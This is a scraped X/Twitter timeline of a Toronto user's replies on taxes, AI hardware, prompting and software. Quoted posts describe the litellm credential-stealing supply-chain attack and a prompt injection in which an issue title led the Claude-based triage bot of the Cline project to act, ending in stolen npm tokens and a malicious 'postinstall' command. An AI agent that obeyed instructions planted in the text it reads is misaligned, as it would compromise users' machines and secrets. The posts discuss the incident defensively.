Bob Loblaw

2.4K posts

Bob Loblaw

Bob Loblaw

@cburatto

Trying to make all possible mistakes, just not all at the same time.

Toronto, Ontario Katılım Şubat 2010
1.4K Takip Edilen110 Takipçiler
Bob Loblaw
Bob Loblaw@cburatto·
@renanhiramatsu Ex: venda de 100 no BR, retido 15 de IR. A LLC deve 20 nos EUA sobre essa receita BR. Apresenta a retenção, paga a diferença de 5 na LLC. Obviamente, não aceite conselhos de desconhecidos na Internet :-)
Português
1
0
1
76
Bob Loblaw
Bob Loblaw@cburatto·
@renanhiramatsu Certeza? Se a Apple está retendo imposto você declararia esse pagamento como imposto retido e ele é deduzido do seu LLC a pagar. Acordo tributário BR US. A única desvantagem é quando o IR retido é maior do que o IR a pagar na LLC, pois vc só pode deduzir até o q a LLC deve. +
Português
1
0
1
70
renan h.
renan h.@renanhiramatsu·
Em 2025 eu paguei uma Porsche em impostos pro Brasil nos meus apps da AppStore. E eu nem moro lá. Porque? A Apple retira todo mês do meu pgto mensal por volta de 15-17% de IRRF. Segue a img pra quem quer saber a receita líquida que vai ter se vender usando uma LLC pro BR.
renan h. tweet media
Português
8
4
86
10.2K
Bob Loblaw
Bob Loblaw@cburatto·
@FernandoCruz_21 Mudamos de um Fusca para um Tesla. Tem autopilot, mas na hora em que desengata, você continua tendo que saber dirigir.
Português
0
0
2
276
Fernando Cruz → allowa.tech
Fernando Cruz → allowa.tech@FernandoCruz_21·
Não mano, você ainda não entendeu, pra ficar batendo nessa tecla que a barreira de código morreu. Devs não “escreverem” mais código, mas guiam estritamente como o código deve ser escrito, habilidade que você não tem. Assim como eu não entendo de cinema e mesmo com AI me bateria pra fazer os vídeos cinematográficos que você faz, acredito que você entende de iluminação, roteiro, ângulos e etc… Construir software é muito mais que qualquer um escrever código, você até tentou, foi exposto, o código que estava lá era uma piada de tão ruim. Quando você fica repetindo que barreira do código morreu, de forma leviana pra uma audiência relativamente alta, você só está levando mais pessoas pra passarem pelo que você passou e coisas até piores. E só pro seu conhecimento os reports indicam que a contratação de Devs aumentou.
Abraham@Abraham_Abrahub

@FernandoCruz_21 Sim, a lição da segurança foi aprendida. Não é brincadeira. Mas continuo acreditando que a barreira do código morreu, os próprios devs estão admitindo que não escrevem mais código kkkk

Português
14
12
299
15.2K
Kevin A. Bryan
Kevin A. Bryan@Afinetheorem·
@cburatto @karpathy It is wild to me that folks are using OpenClaw at all. It's just asking for your computer to get nuked.
English
1
0
1
24
Andrej Karpathy
Andrej Karpathy@karpathy·
Software horror: litellm PyPI supply chain attack. Simple `pip install litellm` was enough to exfiltrate SSH keys, AWS/GCP/Azure creds, Kubernetes configs, git credentials, env vars (all your API keys), shell history, crypto wallets, SSL private keys, CI/CD secrets, database passwords. LiteLLM itself has 97 million downloads per month which is already terrible, but much worse, the contagion spreads to any project that depends on litellm. For example, if you did `pip install dspy` (which depended on litellm>=1.64.0), you'd also be pwnd. Same for any other large project that depended on litellm. Afaict the poisoned version was up for only less than ~1 hour. The attack had a bug which led to its discovery - Callum McMahon was using an MCP plugin inside Cursor that pulled in litellm as a transitive dependency. When litellm 1.82.8 installed, their machine ran out of RAM and crashed. So if the attacker didn't vibe code this attack it could have been undetected for many days or weeks. Supply chain attacks like this are basically the scariest thing imaginable in modern software. Every time you install any depedency you could be pulling in a poisoned package anywhere deep inside its entire depedency tree. This is especially risky with large projects that might have lots and lots of dependencies. The credentials that do get stolen in each attack can then be used to take over more accounts and compromise more packages. Classical software engineering would have you believe that dependencies are good (we're building pyramids from bricks), but imo this has to be re-evaluated, and it's why I've been so growingly averse to them, preferring to use LLMs to "yoink" functionality when it's simple enough and possible.
Daniel Hnyk@hnykda

LiteLLM HAS BEEN COMPROMISED, DO NOT UPDATE. We just discovered that LiteLLM pypi release 1.82.8. It has been compromised, it contains litellm_init.pth with base64 encoded instructions to send all the credentials it can find to remote server + self-replicate. link below

English
1.4K
5.4K
28K
66.4M
Bob Loblaw
Bob Loblaw@cburatto·
@dfolloni @cline Sandboxing, credenciais dedicadas e com menos direitos possíveis (oauth apps em vez de simplesmente dar sua senha pro openclaw), hooks ou MCPs para ações potencialmente catastróficas com segundo agent revisando e escalando pro usuário. O q mais?
Português
0
0
1
116
Deborah Folloni → 🪽epic.new
Um hacker simplesmente hackeou o @cline e instalou o OpenClaw em 4.000 computadores com prompt injection 🫠 Olha que loucura: - O time do Cline criou um workflow de triagem de issues automatizado no GitHub, usando o próprio Claude pra ler e categorizar os tickets - O hacker abriu uma issue com um prompt injection no título — o Claude leu, achou que era uma instrução legítima, e executou - Com isso, ele encheu o cache do GitHub com lixo até forçar a deleção dos caches legítimos de build, substituiu por caches envenenados, e roubou os tokens de publicação do npm - Com os tokens em mãos, ele publicou uma nova versão do cline que parecia idêntica a anterior, só que com uma linhazinha a mais no package.json: "postinstall": "npm install -g openclaw@latest" Resultado: 4,000 devs instalaram o openclaw nas suas máquinas sem saber (aka: um agente com acesso total ao seu computador) 🥲 Muito importante lembrar que IAs não têm malícia e por isso prompt injections são, na minha opinião, a maior vulnerabilidade delas. Resumindo galera: CUIDADO. quem quiser ler na íntegra: thehackernews.com/2026/02/cline-…
Português
61
265
2K
164.8K
Bob Loblaw
Bob Loblaw@cburatto·
@TheNathanNS He should have a new show "Nightmare Gordon Licensees" where he goes to their factories and lashes out.
English
0
0
0
561
𝔑𝔞𝔱𝔥𝔞𝔫
𝔑𝔞𝔱𝔥𝔞𝔫@TheNathanNS·
There's a guy I sometimes watch on YouTube, Gary Eats who's been to Gordon Ramsay's restaurants and pointed out how poor the quality was. The fact he's doing the same thing with these frozen meals too is shocking for a man who built a massive chunk of his career on bettering struggling restaurants
English
260
646
30.5K
4.4M
Bob Loblaw
Bob Loblaw@cburatto·
@GergelyOrosz Wisdom: having the power to do it, but don't. Yes, this will likely cause some price adjustments, especially as the providers leverage AI themselves. You can build Jira? Jira can now charge 1 dollar per seat. Would you still build it?
English
0
0
0
28
Pedro Cerize
Pedro Cerize@PedroCerize·
Esse gráfico explica porque sou absolutamente cético com energia renovável pra ICE. O petróleo dava portabilidade da energia. Hoje as baterias já estão fazendo isso. O carro como conhecemos hoje, guiado por um humano, com propulsão a hidrocarboneto vai ser substituído como as carruagens foram na virada do século 20. Em 50 anos poucas petroleiras de hoje ainda vão existir. Nos investimentos é importante estar do lado certo da história
Lucas Di Grassi@LucasdiGrassi

Imagina se você tem 1 hectare e precisa escolher o que é mais eficiente fazer: cana de açúcar ou painéis solares 👇🏻

Português
45
20
553
74.8K
Ivan Fioravanti ᯅ
Ivan Fioravanti ᯅ@ivanfioravanti·
Prompt: Create a complete, single-file HTML Snake game (no external files, no images) that looks and behaves EXACTLY like this specification: - Retro arcade style with dark background (#0a0a0a) and bright neon green theme (#0f0). - Use Google font 'Press Start 2P' via @import. - Canvas size: 420×420 pixels, 21×21 grid (tile size = 20px). - Snake starts at length 3, moving right. - Snake head is bright lime (#00ff41) with black eyes that always face the current direction (4 different eye positions). - Body alternates between two shades of green (#00cc33 and #00aa22). - Food is a red circle (#ff0044) with a small white highlight. - Light gray grid lines on the background. - UI elements: - Title "SNAKE" in big retro font + subtitle "AUTOPLAY AI ENABLED BY DEFAULT" - Score and Length counters in glowing boxes - Two buttons: "PAUSE / RESUME" and "NEW GAME" - Status text "🤖 AI AUTOPLAY ACTIVE" in yellow - Game Over overlay with big "GAME OVER", final score, and Restart button Game features: - Speed: 65ms per tick - AI autoplay ON by default (uses BFS to find shortest safe path to food, treats body except tail as obstacle) - If no path to food, fallback to any safe move (prefers continuing in current direction) - Keyboard support: Arrow keys + WASD (prevent 180° reverse) - SPACE or P to pause - Collision with walls or self = game over - Eating food increases score by 10 and grows snake - Game auto-starts on load with AI enabled - Clicking "NEW GAME" fully resets everything The final output must be ONE complete .html file saved and opened directly in a browser. Make it visually identical to a high-quality retro neon Snake game. Include all CSS inline, no external dependencies except the Google font import.
English
2
1
18
2.6K
Bob Loblaw
Bob Loblaw@cburatto·
@robin_j_brooks People saying Brazil is "just a commodities based country" should see the cutting edge tech and management of these commodity businesses. Yes, they are "just commodities" but with operations hard to replicate anywhere else. And with room for improvement.
English
0
0
0
105
Robin Brooks
Robin Brooks@robin_j_brooks·
So much of Brazil's economic stagnation after 2014 has been linked to corruption, but really it was just about the massive drop in oil prices as US shale came on the world market. Corruption is as bad as ever, but Brazil is back to growing again strongly. robinjbrooks.substack.com/p/brazils-rema…
Robin Brooks tweet media
English
53
79
615
70.2K
Bob Loblaw
Bob Loblaw@cburatto·
@aakashgupta Maybe it would be possible to extend an existing chip with "expansion cards" and sustain a 18 to 24 month replacement cycle without much trouble. Model updates would be like adding RAM.
English
0
0
0
16
Aakash Gupta
Aakash Gupta@aakashgupta·
Nvidia paid $20 billion for Groq’s IP. Taalas raised $169 million with 24 employees. And they just demonstrated 8x faster single-model inference than Cerebras on the same Llama 3.1 8B. The number everyone’s fixating on is the speed. The number that actually matters is the constraint. HC1 runs exactly one model. Llama 3.1 8B, released July 2024, aggressively quantized to 3-bit and 6-bit precision with measurable quality degradation. You can’t swap in a new architecture. You can’t load different weights. If you want to serve Llama 4, you fabricate an entirely new chip. This tells you everything about what Taalas is actually betting on. They’re betting model release cadences slow down. That enterprises will lock into stable, mature models for 12+ months. That the two-month tapeout cycle they’ve built with TSMC (N6 process, 815 mm2 die, only two metal layers change per model) can keep pace with a frontier that’s still accelerating. The economics on paper are staggering. 0.75 cents per million tokens versus Cerebras at 10 cents. That’s 13x cheaper. Ten HC1 cards in an air-cooled 2U server pull 2,500 watts total. No HBM, no liquid cooling, no advanced packaging. The founder, Ljubisa Bajic, cofounded Tenstorrent and grew it to unicorn status before starting Taalas. Jim Keller was his first angel investor. This team has shipped silicon before. Where it gets interesting is the multi-chip math. Taalas simulated DeepSeek R1 671B across 30 custom HC chips: 12,000 tokens per second at 7.6 cents per million tokens. Nobody has run that in production. Simulated multi-chip inference and production multi-chip inference are different engineering problems with very different failure modes. The real question is market timing. If model improvements keep delivering large generational gains, the two-month fabrication cycle can’t keep up and you’re perpetually running yesterday’s model in silicon. If improvements plateau and enterprises standardize on stable versions for their highest-volume workloads, Taalas wins on pure economics. Medical devices don’t hot-swap models mid-certification. Satellites don’t patch weights in orbit. Nvidia just priced Groq’s fast-inference approach at $20 billion. A 24-person team in a different corner of the same design space just showed 45x the single-model throughput of a B200. The acquisition math writes itself. Whether the production math does is the $169 million bet.
Wildminder@wildmindai

17,000 tokens per second!! Read that again! LLM is hard-wired directly into silicon. no HBM, no liquid cooling, just raw specialized hardware. 10x faster and 20x cheaper than a B200. the "waiting for the LLM to think" era is dead. Code generates at the speed of human thought. Transition from brute-force GPU clusters to actual AI appliances. taalas.com/the-path-to-ub…

English
89
93
929
146.9K
Bob Loblaw
Bob Loblaw@cburatto·
@dhh Crazy. Suppose you plateau the training at some point. Etch Claude Opus 10 on this thing. You will need to replace every X months. Or just run it locally and assume replacement at laptop rates, focus research on "knowledge expansion cards"
English
0
0
0
191
DHH
DHH@dhh·
Taalas is crazy. My go-to (ha!) prompt for creating a simple wiki system in 0.062s with 15,000 tok/sec?! It looks like it's cheating, but it's real. Unbelievable. chatjimmy.ai
DHH tweet media
English
79
50
1.3K
130.5K
Bob Loblaw
Bob Loblaw@cburatto·
@burkov Tell it what you are going to say. Say it. Tell it what you said.
English
0
0
1
259
BURKOV
BURKOV@burkov·
LLMs process text from left to right — each token can only look back at what came before it, never forward. This means that when you write a long prompt with context at the beginning and a question at the end, the model answers the question having "seen" the context, but the context tokens were generated without any awareness of what question was coming. This asymmetry is a basic structural property of how these models work. The paper asks what happens if you just send the prompt twice in a row, so that every part of the input gets a second pass where it can attend to every other part. The answer is that accuracy goes up across seven different benchmarks and seven different models (from the Gemini, ChatGPT, Claude, and DeepSeek series of LLMs), with no increase in the length of the model's output and no meaningful increase in response time — because processing the input is done in parallel by the hardware anyway. There are no new losses to compute, no finetuning, no clever prompt engineering beyond the repetition itself. The gap between this technique and doing nothing is sometimes small, sometimes large (one model went from 21% to 97% on a task involving finding a name in a list). If you are thinking about how to get better results from these models without paying for longer outputs or slower responses, that's a fairly concrete and low-effort finding. Read with AI tutor: chapterpal.com/s/1b15378b/pro… Get the PDF: arxiv.org/pdf/2512.14982
BURKOV tweet media
English
393
1.1K
11.6K
3M
Bob Loblaw
Bob Loblaw@cburatto·
@rockatanescu @GergelyOrosz Maybe Heroku is already dead and it is not worth keeping the lights on for 3 users. Do you know of any big users?
English
1
0
0
43
Andrei Maxim
Andrei Maxim@rockatanescu·
@GergelyOrosz I hope somebody would explain what's the benefit of putting Heroku in KTLO mode in time when everybody will want to build their own apps and would need a simple PaaS to deploy to, with easy integration with all these third-party services.
English
4
0
33
2.1K
Gergely Orosz
Gergely Orosz@GergelyOrosz·
Translation of this nonsense corporate talk: “We will be killing Heroku Not today and not tomorrow But don’t say we didn’t warn you PS: I’m just a marketing guy here and they told me to write something that legal would approve so here you go:”
Heroku@heroku

Heroku is transitioning to a sustaining engineering model focused on stability, security, reliability, and support. Heroku remains an actively supported, production-ready platform, with an emphasis on maintaining quality and operational excellence rather than introducing new features. We know changes like this can raise questions, and we want to be clear about what this means for customers. There is no change for customers using Heroku today. Customers who pay via credit card in the Heroku dashboard—both existing and new—can continue to use Heroku with no changes to pricing, billing, service, or day-to-day usage. Core platform functionality, including applications, pipelines, teams, and add-ons, is unaffected, and customers can continue to rely on Heroku for their production, business-critical workloads. Enterprise Account contracts will no longer be offered to new customers. Existing Enterprise subscriptions and support contracts will continue to be fully honored and may renew as usual. Why this change We’re focusing our product and engineering investments on areas where we can deliver the greatest long-term customer value, including helping organizations build and deploy enterprise-grade AI in a secure and trusted way.

English
24
30
831
65.5K